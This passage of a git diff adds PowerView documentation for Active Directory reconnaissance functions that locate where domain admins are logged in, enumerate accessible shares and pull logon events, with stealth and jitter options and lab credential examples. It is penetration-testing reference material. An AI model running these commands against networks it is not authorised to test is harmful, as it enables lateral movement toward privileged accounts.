+Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: TargetUser +Aliases: AdminCount + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserProcess + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainShare.md b/docs/Recon/Find-DomainShare.md new file mode 100755 index 0000000..71274b7 --- /dev/null +++ b/docs/Recon/Find-DomainShare.md 
@@ -0,0 +1,335 @@ +# Find-DomainShare + +## SYNOPSIS +Searches for computer shares on the domain. +If -CheckShareAccess is passed, +then only shares the current user has read access to are returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction + +## SYNTAX + +``` +Find-DomainShare [[-ComputerName] ] [-ComputerDomain ] [-ComputerLDAPFilter ] + [-ComputerSearchBase ] [-ComputerOperatingSystem ] [-ComputerServicePack ] + [-ComputerSiteName ] [-CheckShareAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. +If -CheckShareAccess is passed, then +\[IO.Directory\]::GetFiles() is used to check if the current user has read +access to the given share. +If -Credential is passed, then +Invoke-UserImpersonation is used to impersonate the specified user before +enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainShare +``` + +Find all domain shares in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainShare -CheckShareAccess +``` + +Find all domain shares in the current domain that the current user has +read access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches for domain shares in the testlab.local domain using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Domain + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckShareAccess +Switch. +Only display found shares that the local user has access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: CheckAccess + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ShareInfo + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainUserEvent.md b/docs/Recon/Find-DomainUserEvent.md new file mode 100755 index 0000000..12e64a9 --- /dev/null +++ b/docs/Recon/Find-DomainUserEvent.md 
@@ -0,0 +1,451 @@ +# Find-DomainUserEvent + +## SYNOPSIS +Finds logon events on the current (or remote domain) for the specified users. + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction + +## SYNTAX + +### Domain (Default) +``` +Find-DomainUserEvent [-Domain ] [-Filter ] [-StartTime ] [-EndTime ] + [-MaxEvents ] [-UserIdentity ] [-UserDomain ] [-UserLDAPFilter ] + [-UserSearchBase ] [-UserGroupIdentity ] [-UserAdminCount] [-CheckAccess] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### ComputerName +``` +Find-DomainUserEvent [[-ComputerName] ] [-Filter ] [-StartTime ] + [-EndTime ] [-MaxEvents ] [-UserIdentity ] [-UserDomain ] + [-UserLDAPFilter ] [-UserSearchBase ] [-UserGroupIdentity ] [-UserAdminCount] + [-CheckAccess] [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] + [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] [-Jitter ] + [-Threads ] +``` + +## DESCRIPTION +Enumerates all domain controllers from the specified -Domain +(default of the local domain) using Get-DomainController, enumerates +the logon events for each using Get-DomainUserEvent, and filters +the results based on the targeting criteria. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainUserEvent +``` + +Search for any user events matching domain admins on every DC in the current domain. 
+ +### -------------------------- EXAMPLE 2 -------------------------- +``` +$cred = Get-Credential dev\administrator +``` + +Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john' + +Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local' +domain controller using the alternate credential + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'} +``` + +Find user events on the primary.testlab.local system where the event matches +the IPAddress '192.168.52.200' or '192.168.52.201'. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$cred = Get-Credential testlab\administrator +``` + +Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'} + +Find user events mathing the specified GUID AND the specified TargetLogonId, searching +through every domain controller in the current domain, enumerating each DC in serial +instead of in a threaded manner, using the alternate credential. + +## PARAMETERS + +### -ComputerName +Specifies an explicit computer name to retrieve events from. + +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: dnshostname, HostName, name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies a domain to query for domain controllers to enumerate. +Defaults to the current domain. + +```yaml +Type: String +Parameter Sets: Domain +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Filter +A hashtable of PowerView.LogonEvent properties to filter for. 
+The 'op|operator|operation' clause can have '&', '|', 'and', or 'or', +and is 'or' by default, meaning at least one clause matches instead of all. +See the exaples for usage. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StartTime +The \[DateTime\] object representing the start of when to collect events. +Default of \[DateTime\]::Now.AddDays(-1). + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now.AddDays(-1) +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -EndTime +The \[DateTime\] object representing the end of when to collect events. +Default of \[DateTime\]::Now. + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -MaxEvents +The maximum number of events (per host) to retrieve. +Default of 5000. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 5000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount +Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AdminCount + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckAccess +{{Fill CheckAccess Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target computer(s). + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LogonEvent + +PowerView.ExplicitCredentialLogon + +## NOTES + +## RELATED LINKS + +[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/) + diff --git a/docs/Recon/Find-DomainUserLocation.md b/docs/Recon/Find-DomainUserLocation.md new file mode 100755 index 0000000..0d200aa --- /dev/null +++ b/docs/Recon/Find-DomainUserLocation.md 
@@ -0,0 +1,579 @@ +# Find-DomainUserLocation + +## SYNOPSIS +Finds domain machines where specific users are logged into. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction + +## SYNTAX + +### UserGroupIdentity (Default) +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] [-UserGroupIdentity ] + [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Stealth] [-StealthSource ] [-Threads ] +``` + +### UserIdentity +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] + [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Stealth] [-StealthSource ] [-Threads ] +``` + +### ShowAll +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] [-UserAdminCount] + [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] 
[-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] + [-Jitter ] [-ShowAll] [-Stealth] [-StealthSource ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. +Then for each server the +function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon +The found user list is compared against the target list, and any matches are +displayed. +If -ShowAll is specified, all results are displayed instead of +the filtered set. +If -Stealth is specified, then likely highly-trafficed servers +are enumerated with Get-DomainFileServer/Get-DomainController, and session +enumeration is executed only against those servers. +If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainUserLocation +``` + +Searches for 'Domain Admins' by enumerating every computer in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainUserLocation -Stealth -ShowAll +``` + +Enumerates likely highly-trafficked servers, performs just session enumeration +against each, and outputs all results. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local +``` + +Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged +users in dev.testlab.local. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainUserLocation -Domain testlab.local -Credential $Cred + +Searches for domain admin locations in the testlab.local using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to query for computers AND users, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerUnconstrained +Switch. +Search computer objects that have unconstrained delegation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Unconstrained + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: UserIdentity +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: UserGroupIdentity +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount +Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AdminCount + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAllowDelegation +Switch. +Search for user accounts that are not marked as 'sensitive and not allowed for delegation'. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AllowDelegation + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckAccess +Switch. +Check if the current user has local admin access to computers where target users are found. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ShowAll +Switch. +Return all user location results instead of filtering based on target +specifications. + +```yaml +Type: SwitchParameter +Parameter Sets: ShowAll +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Stealth +Switch. +Only enumerate sessions from connonly used target servers. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StealthSource +The source of target servers to use, 'DFS' (distributed file servers), +'DC' (domain controllers), 'File' (file servers), or 'All' (the default). 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserLocation + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingDomainAcl.md b/docs/Recon/Find-InterestingDomainAcl.md new file mode 100755 index 0000000..eeda73a --- /dev/null +++ b/docs/Recon/Find-InterestingDomainAcl.md 
